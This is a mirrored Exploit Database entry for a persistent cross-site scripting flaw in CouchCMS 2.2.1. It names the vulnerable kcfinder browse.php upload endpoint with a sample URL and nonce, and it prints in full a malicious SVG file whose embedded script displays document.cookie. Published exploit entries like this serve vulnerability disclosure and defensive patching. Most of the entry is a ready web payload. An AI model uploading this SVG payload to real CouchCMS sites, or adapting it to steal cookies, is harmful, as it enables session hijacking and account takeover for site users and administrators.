CouchCMS 2.2.1 – Persistent Cross-Site Scripting

• Exploit Database
• 18 阅读

• 作者： xxcdd
  日期： 2021-03-11
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/49636/

• # Exploit Title: CouchCMS 2.2.1 - XSS via SVG file upload
  # Date: 2021-01-25
  # Exploit Author: xxcdd
  # Vendor Homepage: https://github.com/CouchCMS/CouchCMS
  # Software Link: https://github.com/CouchCMS/CouchCMS
  # Version: v2.2.1
  # Tested on: Windows 7
  
  An issue was discovered in CouchCMS v2.2.1 (https://github.com/CouchCMS/CouchCMS/issues/130) that allows XSS via an /couch/includes/kcfinder/browse.php SVG upload.
  
  upload url is :/couch/includes/kcfinder/browse.php?nonce=[yournonce]&type=file&CKEditor=f_main_content&CKEditorFuncNum=1&langCode=en
  <http://127.0.0.1/couch/includes/kcfinder/browse.php?nonce=02b16f710f786c61f34e301eae552bdf&type=file&CKEditor=f_main_content&CKEditorFuncNum=1&langCode=en>
  
  xss.svg content:
  
  <?xml version="1.0" standalone="no"?>
  <!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "
  http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
  <svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
  <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900"
  stroke="#004400"/>
  <script type="text/javascript">
  alert(document.cookie);
  </script>
  </svg>